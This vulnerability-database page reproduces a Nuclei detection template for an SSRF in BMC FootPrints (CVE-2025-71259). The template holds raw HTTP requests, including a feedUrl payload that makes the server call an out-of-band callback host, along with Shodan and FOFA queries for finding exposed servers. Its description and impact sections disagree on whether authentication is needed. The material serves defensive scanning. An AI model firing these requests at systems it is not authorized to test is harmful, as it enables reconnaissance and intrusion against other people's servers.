Lucene search
K

BMC FootPrints 'feedUrl' - Server-Side Request Forgery

🗓️ 08 Jul 2026 05:22:06Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 16 Views

SSRF in BMC FootPrints feedUrl enables unauthenticated access to internal URLs, enabling pre-auth RCE.

Related
Refs
Code
ReporterTitlePublishedViews
Family
ATTACKERKB
CVE-2025-71260
19 Mar 202613:45
attackerkb
ATTACKERKB
CVE-2025-71259
19 Mar 202613:44
attackerkb
Circl
CVE-2025-71259
18 Mar 202610:44
circl
Circl
CVE-2025-71260
18 Mar 202610:44
circl
CNNVD
BMC FootPrints 代码问题漏洞
19 Mar 202600:00
cnnvd
CNNVD
BMC FootPrints 代码问题漏洞
19 Mar 202600:00
cnnvd
CVE
CVE-2025-71259
19 Mar 202613:44
cve
CVE
CVE-2025-71260
19 Mar 202613:45
cve
Cvelist
CVE-2025-71259 BMC FootPrints ITSM 20.20.02 <= 20.24.01.001 Blind SSRF in externalfeed/RSS
19 Mar 202613:44
cvelist
Cvelist
CVE-2025-71260 BMC FootPrints ITSM 20.20.02 <= 20.24.01.001 VIEWSTATE Deserialization RCE
19 Mar 202613:45
cvelist
Rows per page
id: CVE-2025-71259

info:
  name: BMC FootPrints 'feedUrl' - Server-Side Request Forgery
  author: watchTowr,DhiyaneshDk
  severity: high
  description: |
    BMC FootPrints versions 20.20.02 through 20.24.01.001 contain a Server-Side Request Forgery (SSRF) vulnerability in the /footprints/servicedesk/externalfeed/RSS endpoint. The 'feedUrl' parameter allows unauthenticated attackers to force the server to make HTTP requests to arbitrary URLs, enabling access to internal services and bypassing firewall restrictions. This vulnerability is part of a pre-authenticated RCE chain when combined with CVE-2025-71257 (auth bypass) and CVE-2025-71260 (deserialization).
  impact: |
    Authenticated attackers can make the server send arbitrary outbound requests, potentially interacting with internal services or causing denial of service.
  remediation: |
    Apply the hotfixes released by BMC on September 2, 2025 for all affected branches. Update to the latest patched version of BMC FootPrints.
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
    cvss-score: 8.6
    cve-id: CVE-2025-71259
    epss-score: 0.12916
    epss-percentile: 0.9584
    cwe-id: CWE-918
  metadata:
    verified: true
    max-request: 1
    shodan-query: html:"/footprints/servicedesk/"
    product: footprints
    vendor: bmc
    fofa-query: body="/footprints/servicedesk/"
  reference:
    - https://labs.watchtowr.com/thanks-itsms-threat-actors-have-never-been-so-organized-bmc-footprints-pre-auth-remote-code-execution-chains/
    - https://docs.bmc.com/xwiki/bin/view/More-Products/Footprints/FootPrints/fp2024/
    - https://nvd.nist.gov/vuln/detail/CVE-2025-71259
  tags: cve,cve2025,servicedesk,bmc-software,ssrf,oast,oob,footprints,bmc

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /footprints/servicedesk/passwordreset/request/ HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - contains(set_cookie, "SEC_TOKEN=")
        internal: true

  - raw:
      - |
        GET /footprints/servicedesk/externalfeed/RSS?feedUrl=http://{{interactsh-url}}&dataEncoding=x HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - dns
# digest: 4b0a004830460221008899c075c6ba1caf75873742e3f4f7984450614bffeb31e17f54d5637144abb0022100e38119930101a0f7d0e09a71950530c75a5d796d6a28d0d6db97c0fd2cf304f4:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

18 Mar 2026 10:50Current
6.2Medium risk
Vulners AI Score6.2
CVSS 3.17.1 - 8.8
CVSS 48.7
EPSS0.3436
SSVC
16